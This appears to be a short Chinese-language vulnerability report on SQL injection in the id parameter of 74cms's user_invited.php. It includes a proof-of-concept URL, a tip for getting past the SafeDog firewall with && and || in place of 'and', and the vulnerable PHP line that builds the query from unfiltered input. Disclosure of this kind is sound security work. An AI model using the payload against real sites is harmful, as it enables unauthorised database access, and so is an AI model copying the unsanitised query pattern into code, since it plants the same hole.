注册企业账户,填写企业信息,然后发布职位。再访问下面的URL。
http://demo.74cms.com/user/user_invited.php?id=1&act=invited
其中id参数可以注入。
由于有安全狗的原因,and会被拦截,我们用&&和||代替吧.
http://demo.74cms.com/user/user_invited.php?id=1%20||%201&act=invited
代码/user/user_invited.php:191:
```
$row = $db->getone("select * from ".table('company_down_resume')." where company_uid={$_SESSION['uid']} and resume_id = {$_GET['id']}");
if(!$row){
//-------------------//
if($_SESSION['utype']==1){
if ($_CFG['operation_mode']=="2")
{
```
由于id参数没有过滤直接带入到了数据库查询语句中造成了SQL注入。
暂无评论